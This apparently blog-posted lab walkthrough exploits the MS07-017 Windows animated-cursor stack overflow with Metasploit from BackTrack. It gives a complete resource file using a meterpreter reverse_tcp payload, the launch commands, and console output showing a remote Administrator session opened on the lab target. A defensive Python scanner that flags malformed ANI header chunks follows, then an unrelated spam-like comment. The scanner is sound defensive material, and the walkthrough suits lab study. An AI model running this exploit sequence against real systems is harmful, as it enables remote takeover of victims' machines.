Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)
Step 1: Create a resource file in the /tmp directory for Metasploit to use
root@bt:~# nano /tmp/exploit
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 131.107.1.252
set LHOST 131.107.1.252
set LPORT 443
set URIPATH /you_win.html
exploit
Press Ctrl-X to exit and save the file.
Step 2: Launch the exploit using the resource file you created earlier
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /tmp/exploit
[*] Exploit running as background job.
[*] Started reverse handler on 131.107.1.252:443
[*] Using URL: http://131.107.1.252:80/you_win.html
[*] Server started.
Step 3: Launch Internet Explorer on the remote machine and connect to http://131.107.1.252/you_win.html
Step 4: On our machine, check whether the connection from the target machine has arrived
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 131.107.1.50:1163...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 131.107.1.50:1163...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:443 -> 131.107.1.50:1164) at Wed Sep 15 17:08:18 +0800 2010
Display all active sessions
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
  Id  Type         Information                      Connection
  --  ----         -----------                      ----------
  1   meterpreter  LON-CL1\Administrator @ LON-CL1  131.107.1.252:443 -> 131.107.1.50:1164
Interact with an active session
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
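
For defenders, the chunk-size condition named in the module output above can be checked statically before a cursor file reaches a vulnerable host. The following is an added example, not part of the original post or of Metasploit: a Python scanner that walks the RIFF chunks of an ANI file and flags any anih chunk whose declared size differs from the 36 bytes of the standard ANI header. The function names and the zero-filled sample files are constructed for illustration.

```python
import struct

ANIH_SIZE = 36  # the standard ANI header structure is nine 32-bit fields


def iter_chunks(data, start, end):
    """Yield (tag, declared_size, offset) for each RIFF chunk in data[start:end]."""
    pos = start
    while pos + 8 <= end:
        tag = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        yield tag, size, pos
        if tag == b"LIST":
            # A LIST body is a 4-byte list type followed by nested chunks
            yield from iter_chunks(data, pos + 12, min(pos + 8 + size, end))
        pos += 8 + size + (size & 1)  # chunk bodies are padded to even length


def scan_ani(data):
    """Return a list of findings; an empty list means nothing suspicious."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON file"]
    findings = []
    for tag, size, pos in iter_chunks(data, 12, len(data)):
        if tag == b"anih" and size != ANIH_SIZE:
            findings.append(
                f"anih chunk at offset {pos} declares {size} bytes, expected {ANIH_SIZE}")
        if pos + 8 + size > len(data):
            findings.append(f"{tag!r} chunk at offset {pos} runs past end of file")
    return findings


def _chunk(tag, body):
    # Helper used only to build the constructed samples below
    return tag + struct.pack("<I", len(body)) + body + (b"\x00" if len(body) & 1 else b"")


def _riff(*chunks):
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: zero-filled bodies, no real cursor data
CLEAN = _riff(_chunk(b"anih", bytes(36)), _chunk(b"rate", bytes(4)))
MALFORMED = _riff(_chunk(b"anih", bytes(36)), _chunk(b"anih", bytes(80)))

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("malformed", MALFORMED)):
        print(name, scan_ani(sample) or "ok")
```

The same check can run on a web proxy or mail gateway against any response body that starts with RIFF and ACON, regardless of the file extension or URL it was served under.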
The men have been developing the new software for the information of the people. That has been very beneficial for the student.
Thanks.....
regards, saad from
Education